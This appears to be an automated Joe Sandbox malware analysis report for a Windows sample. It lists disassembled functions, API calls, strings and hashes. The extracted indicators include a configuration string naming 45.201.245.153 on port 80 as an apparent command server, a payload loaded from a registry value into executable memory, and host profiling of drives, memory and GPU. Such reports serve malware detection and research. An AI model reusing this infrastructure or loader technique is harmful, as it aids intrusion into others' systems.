API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
String ID: -N/$NO/$None/%s
API String ID: 3036438616-3095023699
Opcode ID: 79ceeb1568f96b46befd07642ba3e2ff121746183226428717e741165c462c9d
Instruction ID: 80177a772d26dc76b7a34b299a65d4bac12138e0c0f4dcd4c4f0e1b2a699f7d3
Opcode Fuzzy Hash: 79ceeb1568f96b46befd07642ba3e2ff121746183226428717e741165c462c9d
Instruction Fuzzy Hash: 1F41C672A00318EFDB25EB60DC89FEF777CEB09B40F444595F64696240EA34E964CB61

Function 6C395835 Relevance: 30.8, APIs: 2, Strings: 15, Instructions: 1038COMMON

Download Yara Rule

Strings

Pholus's ephemeris is restricted to JD %8.1f - JD %8.1f, xrefs: 6C396407
using Moshier Eph; , xrefs: 6C395B16
.;C:\Astrolog\, xrefs: 6C395BCF
using Moshier eph.; , xrefs: 6C396289, 6C396503
trying Swiss Eph; , xrefs: 6C3959EC, 6C395C65
using Moshier eph.; , xrefs: 6C395A9B
Chiron's ephemeris is restricted to JD %8.1f - JD %8.1f, xrefs: 6C3963C1
`Gl, xrefs: 6C395FF2
illegal planet number %d., xrefs: 6C3962FC
`Gl, xrefs: 6C395D68
barycentric Moshier positions are not supported., xrefs: 6C395876
Interpolated apsides are restricted to JD %8.1f - JD %8.1f, xrefs: 6C39609E
xGl, xrefs: 6C395D9B
sun: , xrefs: 6C396555
de431.eph, xrefs: 6C395BD4

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID:
String ID: using Moshier eph.; $ trying Swiss Eph; $ using Moshier Eph; $ using Moshier eph.; $.;C:\Astrolog\$Chiron's ephemeris is restricted to JD %8.1f - JD %8.1f$Interpolated apsides are restricted to JD %8.1f - JD %8.1f$Pholus's ephemeris is restricted to JD %8.1f - JD %8.1f$`Gl$`Gl$barycentric Moshier positions are not supported.$de431.eph$illegal planet number %d.$sun: $xGl
API String ID: 0-3725435109
Opcode ID: 5f8ed0227d76365d94e03a4730b9f2cd945df6f7554f2a19142e522a911e8198
Instruction ID: 235cf55c2957b3cbe65ad3ce5f4ef2ca21ace8336eb71d8d7cda75d93a0188eb
Opcode Fuzzy Hash: 5f8ed0227d76365d94e03a4730b9f2cd945df6f7554f2a19142e522a911e8198
Instruction Fuzzy Hash: 31826871905515DADF20AF25DC80BD97B70FB4A328F104799E4E8E69D0EB3289E4CF91

Function 6C351112 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 6C3D24FA: __fsopen.LIBCMT ref: 6C3D2507

_sprintf.LIBCMT ref: 6C351133

Part of subcall function 6C371814: _sprintf.LIBCMT ref: 6C37183B
Part of subcall function 6C371814: MessageBoxA.USER32(?,?,00000030), ref: 6C371850

_memset.LIBCMT ref: 6C351265
_memset.LIBCMT ref: 6C351276

Strings

File %s can not be created., xrefs: 6C35112D
, xrefs: 6C351439
, xrefs: 6C3511B6
, xrefs: 6C351453
Version:0.9StartHTML:00000094EndHTML:00010000StartFragment:00000129EndFragment:00010000, xrefs: 6C35119C
, xrefs: 6C3511C0
pDl, xrefs: 6C35111A, 6C35114C, 6C35116F, 6C351482
</body></html>, xrefs: 6C35145D
<html><body>, xrefs: 6C3511A6

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _memset_sprintf$Message__fsopen
String ID: $$ pDl$</body></html>$$$<html><body>$File %s can not be created.$Version:0.9StartHTML:00000094EndHTML:00010000StartFragment:00000129EndFragment:00010000
API String ID: 2973518034-3673930028
Opcode ID: 1ae731d32840ae975ba54c520467e960b9189c1ba0f7b7c9296d11dede91f4d3
Instruction ID: 161a943f5257d859115e2e8ff8d6a5a4029775620989d963ebca2d5c4f1c5417
Opcode Fuzzy Hash: 1ae731d32840ae975ba54c520467e960b9189c1ba0f7b7c9296d11dede91f4d3
Instruction Fuzzy Hash: 14919CB2B09281CBDB10FF66C891C6477F1AB4A308B65053ED5468BE48DB71D898CF97

Function 03D895F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000000,00000AD4), ref: 03D89632
lstrcmpiW.KERNEL32(?,A:\), ref: 03D89666
lstrcmpiW.KERNEL32(?,B:\), ref: 03D89676
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03D896A6
lstrlenW.KERNEL32(?), ref: 03D896B7
__wcsnicmp.LIBCMT ref: 03D896CE
lstrcpyW.KERNEL32(00000AD4,?), ref: 03D89704
lstrcpyW.KERNEL32(?,?), ref: 03D89728
lstrcatW.KERNEL32(?,00000000), ref: 03D89733

Strings

B:\, xrefs: 03D89670
A:\, xrefs: 03D89660

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
String ID: A:\$B:\
API String ID: 950920757-1009255891
Opcode ID: dc280636fddafdef3a6e5214b4381d561d985abde725d01983296a5210872b59
Instruction ID: 91e1c874adc66930b9a597040a2b9e582422b996528667a9cddf5469b4ddbe44
Opcode Fuzzy Hash: dc280636fddafdef3a6e5214b4381d561d985abde725d01983296a5210872b59
Instruction Fuzzy Hash: 95417573A01218DBDB10EFA5DC94AFEB37CEF84710F044599E90AA7244E770EA45CBA4

Function 6C3D1F6A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C3D5DD6

Part of subcall function 6C3D37D0: __FF_MSGBANNER.LIBCMT ref: 6C3D37E9
Part of subcall function 6C3D37D0: __NMSG_WRITE.LIBCMT ref: 6C3D37F0
Part of subcall function 6C3D37D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3D7A8B,?,00000001,?,?,6C3D7F4A,00000018,6C442E78,0000000C,6C3D7FDA), ref: 6C3D3815

std::exception::exception.LIBCMT ref: 6C3D5E0B
std::exception::exception.LIBCMT ref: 6C3D5E25
__CxxThrowException@8.LIBCMT ref: 6C3D5E36
IsDebuggerPresent.KERNEL32 ref: 6C3D5EF7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C3D5F0C
UnhandledExceptionFilter.KERNEL32(6C3FFF84), ref: 6C3D5F17
GetCurrentProcess.KERNEL32(C0000409), ref: 6C3D5F33
TerminateProcess.KERNEL32(00000000), ref: 6C3D5F3A

Strings

0Gl, xrefs: 6C3D5DE9

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandledstd::exception::exception$AllocateCurrentDebuggerException@8HeapPresentTerminateThrow_malloc
String ID: 0Gl
API String ID: 2175014196-667178714
Opcode ID: 7390d96cf474463ae5dc99a544d9b0b327aeae2bbc755232deeab8f44226a3c2
Instruction ID: 03e79abe941d82983865a660c4fbb394703924fb64301c5af0b5585163a9c151
Opcode Fuzzy Hash: 7390d96cf474463ae5dc99a544d9b0b327aeae2bbc755232deeab8f44226a3c2
Instruction Fuzzy Hash: 244171B56023A4DFDF42EF94D448A887FB4FB0A308F10441AE918D7B40DB729A45CFA5

Function 03D88150 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,00000000,74DEDF80,75BF73E0), ref: 03D8818B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03D881AA
_memset.LIBCMT ref: 03D881E1
GlobalMemoryStatusEx.KERNEL32(?), ref: 03D881F4
swprintf.LIBCMT ref: 03D88239
swprintf.LIBCMT ref: 03D8824C

Strings

HDD:%d, xrefs: 03D8822E
@, xrefs: 03D881ED
%sFree%d Gb , xrefs: 03D88241
:, xrefs: 03D88180

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
String ID: %sFree%d Gb $:$@$HDD:%d
API String ID: 3202570353-3501811827
Opcode ID: e10e294d7ef92ca692c5798c9660781fb7ab710e61828591986cb5c34d92ddd3
Instruction ID: d6324e4514c6b11fa91e3c30848ed202ccf041e34d3c375e36e8b7f135b04a2d
Opcode Fuzzy Hash: e10e294d7ef92ca692c5798c9660781fb7ab710e61828591986cb5c34d92ddd3
Instruction Fuzzy Hash: B2314FB7D0021C9BDB14DFE5DC85FEEB7B9EB48700F50421DE91AAB241EA746A05CB90

Function 03D883E0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON

Download Yara Rule

APIs

CreateDXGIFactory.DXGI(03DB64CC,?,90594F2A,00000000,74DEDF80,75BF73E0), ref: 03D8844A
swprintf.LIBCMT ref: 03D8861E
std::_Xinvalid_argument.LIBCPMT ref: 03D886C7

Strings

%s%s %d*%d , xrefs: 03D88837
vector<T> too long, xrefs: 03D886C2
%s%s %d %d , xrefs: 03D88613

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateFactoryXinvalid_argumentstd::_swprintf
String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
API String ID: 3803070356-257307503
Opcode ID: eb57a69883e6c455dd49e2a48c10efc0cb746dbabd5b353b58b86e14e6490d16
Instruction ID: f97073539c8e7aaf401bd9c0832a4f490d06c8082f6e2ff6a675169a660cecdb
Opcode Fuzzy Hash: eb57a69883e6c455dd49e2a48c10efc0cb746dbabd5b353b58b86e14e6490d16
Instruction Fuzzy Hash: 6BE15471E012259FDF24DF28CC81BEEB3B5EB85700F5446E9D94AA7284D770AE819F90

Function 02EB05B8 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 224memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02EB0730
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02EB0768

Strings

ll, xrefs: 02EB07C3
32.d, xrefs: 02EB07BB
Ws2_, xrefs: 02EB07B6, 02EB07BA
ntdl, xrefs: 02EB068B

Memory Dump Source

Source File: 00000006.00000002.3621984576.0000000002EB0000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2eb0000_Fj0RhXL.jbxd

Similarity

API ID: AllocVirtual
String ID: 32.d$Ws2_$ll$ntdl
API String ID: 4275171209-255390435
Opcode ID: a39fa57f05982157fdfc5c527494d81ec470d8fdb14a5e7a4e042a38df2f36b4
Instruction ID: 91e11503b79a7fa7609af6630124859c1e8bc60827e24c233d58de3d21bdb366
Opcode Fuzzy Hash: a39fa57f05982157fdfc5c527494d81ec470d8fdb14a5e7a4e042a38df2f36b4
Instruction Fuzzy Hash: CC91A075488340AFD7229F60C844AABBBE1FF88314F14995DF9D986261DB32D908CF53

Function 02F02FA0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02F03013
recv.WS2_32(?,?,00040000,00000000), ref: 02F03034

Part of subcall function 02F0721D: __getptd_noexit.LIBCMT ref: 02F0721D

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: e356f88b06e1d33847e323f0afaf8ddacba5afa19e1ba3dce90425abf8776845
Instruction ID: eada09b3be9cdefd0f9c1221fc670fdded83ceba73ea3e0a47161a45cc53e285
Opcode Fuzzy Hash: e356f88b06e1d33847e323f0afaf8ddacba5afa19e1ba3dce90425abf8776845
Instruction Fuzzy Hash: BE21B670E41208DBEB24AF64CCC8F9AB765EF05798F1005D5EB04AB1C4D771A984DFA1

Function 02F05E30 Relevance: 52.7, APIs: 5, Strings: 25, Instructions: 186
registryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 02F05E61

Part of subcall function 02F05D50: lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D68
Part of subcall function 02F05D50: _memset.LIBCMT ref: 02F05D72
Part of subcall function 02F05D50: lstrlenW.KERNEL32(|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D7F
Part of subcall function 02F05D50: lstrlenW.KERNEL32(?,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D87

RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 02F0600B
RegQueryValueExW.KERNEL32(?,IpDate,00000000,00000003,00000000,00000000), ref: 02F06030
_memset.LIBCMT ref: 02F06048
RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,0000000A), ref: 02F06068

Strings

p1:, xrefs: 02F05E6D, 02F06071
bh:, xrefs: 02F05F86
ll:, xrefs: 02F05F97
cl:, xrefs: 02F05F1D
dd:, xrefs: 02F05F09
IpDate, xrefs: 02F0602A, 02F06062
bb:, xrefs: 02F05F3F
sh:, xrefs: 02F05FB9
|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02F05E44, 02F06043, 02F06057
bd:, xrefs: 02F05FDB
p2:, xrefs: 02F05EA0, 02F060A4
bz:, xrefs: 02F05F50
fz:, xrefs: 02F05F2E
t1:, xrefs: 02F05E8F, 02F06093
dl:, xrefs: 02F05FA8
o1:, xrefs: 02F05E7E, 02F06082
jp:, xrefs: 02F05F61
Console, xrefs: 02F05FF3
kl:, xrefs: 02F05FCA
p3:, xrefs: 02F05ED6, 02F060DA
o2:, xrefs: 02F05EB4, 02F060B5
t2:, xrefs: 02F05EC5, 02F060C6
t3:, xrefs: 02F05EF8, 02F060FC
o3:, xrefs: 02F05EE7, 02F060EB
sx:, xrefs: 02F05F72

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: _memsetlstrlen$QueryValue$Open
String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
API String ID: 3278200350-4174169328
Opcode ID: 0cb2b43bee42cba43178b94c3ddf1cf9fe81575194eedf476b4b0bb61644fc3d
Instruction ID: 2f9e786a5e1aa2e08c2d25b9ed4be3db13e4a55e12f4463c02ff7c9574ba3228
Opcode Fuzzy Hash: 0cb2b43bee42cba43178b94c3ddf1cf9fe81575194eedf476b4b0bb61644fc3d
Instruction Fuzzy Hash: 4351B3B0BCA30539F92072A54C9BF4DBB156B21FC4FE00242FB0B791D59AE1B100AD6B

Function 02F054B0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263
registrymemorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02F054F7
RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 02F0551E
_memset.LIBCMT ref: 02F05538
RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 02F05553
VirtualAlloc.KERNEL32(00000000,00043FBF,00003000,00000040), ref: 02F05576
RegCloseKey.ADVAPI32(?), ref: 02F055A1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 02F055F5
_memset.LIBCMT ref: 02F05659
_memset.LIBCMT ref: 02F0567D
_memset.LIBCMT ref: 02F0568F
VirtualAlloc.KERNEL32(00000000,00043FBF,00003000,00000040), ref: 02F05716
RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02F05789
RegDeleteValueW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059), ref: 02F0579C
RegSetValueExW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 02F057B4
RegCloseKey.KERNEL32(?), ref: 02F057BE
Sleep.KERNEL32(00000BB8), ref: 02F057EE

Strings

_, xrefs: 02F0563E
i, xrefs: 02F05648
e, xrefs: 02F054CC
l, xrefs: 02F05634
Console\0, xrefs: 02F054E3, 02F0577F
!jWW, xrefs: 02F05620
., xrefs: 02F0562A
bde32d9ec03d5b7fedd304b2f3173b0d, xrefs: 02F055AA
d33f351a4aeea5e608853d1a56661059, xrefs: 02F05518, 02F0554D, 02F05796, 02F057AE
{vU_, xrefs: 02F05616

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
String ID: !jWW$.$Console\0$_$bde32d9ec03d5b7fedd304b2f3173b0d$d33f351a4aeea5e608853d1a56661059$e$i$l${vU_
API String ID: 354323817-214877959
Opcode ID: 11664f981dbc19fbc7499874d8da43e1e8c3f5772189eb7a59d89f95f9d78db0
Instruction ID: 191ba9d193196e750bac026b2873510925a150ebab9bf009ecae6716a9162239
Opcode Fuzzy Hash: 11664f981dbc19fbc7499874d8da43e1e8c3f5772189eb7a59d89f95f9d78db0
Instruction Fuzzy Hash: 3D91E775E40308AFE720DF60DC85F6ABB7AFB85784F804559FA099B280D7B19A40CF61

Function 6C3747B5 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_sprintf.LIBCMT ref: 6C3747FA
_sprintf.LIBCMT ref: 6C374846
GetModuleFileNameA.KERNEL32(?,000000FF,?,?,?,00000000,00000000), ref: 6C374860
_sprintf.LIBCMT ref: 6C3748A1
_sprintf.LIBCMT ref: 6C3748D5
_sprintf.LIBCMT ref: 6C37491C
_sprintf.LIBCMT ref: 6C374963
__wgetenv.LIBCMT ref: 6C37496F
_sprintf.LIBCMT ref: 6C374992
__wgetenv.LIBCMT ref: 6C3749BC
_sprintf.LIBCMT ref: 6C3749DD
__wgetenv.LIBCMT ref: 6C374A03
_sprintf.LIBCMT ref: 6C374A24
_sprintf.LIBCMT ref: 6C374A5B
_sprintf.LIBCMT ref: 6C374AAB
_sprintf.LIBCMT ref: 6C374ADB

Strings

r%s, xrefs: 6C3747F4
%s.as, xrefs: 6C37483A
File '%s' not found., xrefs: 6C374AA5
%s%c%s, xrefs: 6C37480F, 6C37491A, 6C374990, 6C3749DB, 6C374A22, 6C374A59
710, xrefs: 6C37494C
ASTROLOG, xrefs: 6C3749B7
%s%s, xrefs: 6C37495D
ASTR, xrefs: 6C374951, 6C374956, 6C374A02
C:\Astrolog, xrefs: 6C374A4E

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__wgetenv$FileModuleName
String ID: %s%c%s$%s%s$%s.as$710$ASTR$ASTROLOG$C:\Astrolog$File '%s' not found.$r%s
API String ID: 2614078948-576927601
Opcode ID: 45dab5c7261fa94849f895a5f436dfed9cb96850da78900b9b87a62cd1e4444a
Instruction ID: 31779d9beaced4ceb37dd2d80cae306bf9c4f83ed2200a0b6fbeb59ed78145bb
Opcode Fuzzy Hash: 45dab5c7261fa94849f895a5f436dfed9cb96850da78900b9b87a62cd1e4444a
Instruction Fuzzy Hash: 3D91B5F680025CABDF21DB94CD44FDB73BC9B14314F0501E1E699A3941EB79EA888F65

Function 6C3D5ACA Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 99
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__heap_init.LIBCMT ref: 6C3D5ADE

Part of subcall function 6C3DE3BD: HeapCreate.KERNEL32(00000000,00001000,00000000,6C3D5AE3,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3DE3C6

__RTC_Initialize.LIBCMT ref: 6C3D5AFE
GetCommandLineA.KERNEL32(6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D5B03
___crtGetEnvironmentStringsA.LIBCMT ref: 6C3D5B0E

Part of subcall function 6C3E0A9D: GetEnvironmentStringsW.KERNEL32(?,?), ref: 6C3E0AA7

__ioinit.LIBCMT ref: 6C3D5B18

Part of subcall function 6C3D7556: GetStartupInfoW.KERNEL32(?), ref: 6C3D7563
Part of subcall function 6C3D7556: __calloc_crt.LIBCMT ref: 6C3D756F

__ioterm.LIBCMT ref: 6C3D5B51

Part of subcall function 6C3D779B: DeleteCriticalSection.KERNEL32(0000000D,00000000,?,6C3D5B86,6C442D80,00000008,6C3D5C87,?,?,?,6C442DA0,0000000C,6C3D5D42,?), ref: 6C3D77BE
Part of subcall function 6C3D779B: _free.LIBCMT ref: 6C3D77D7

__mtterm.LIBCMT ref: 6C3D5B21

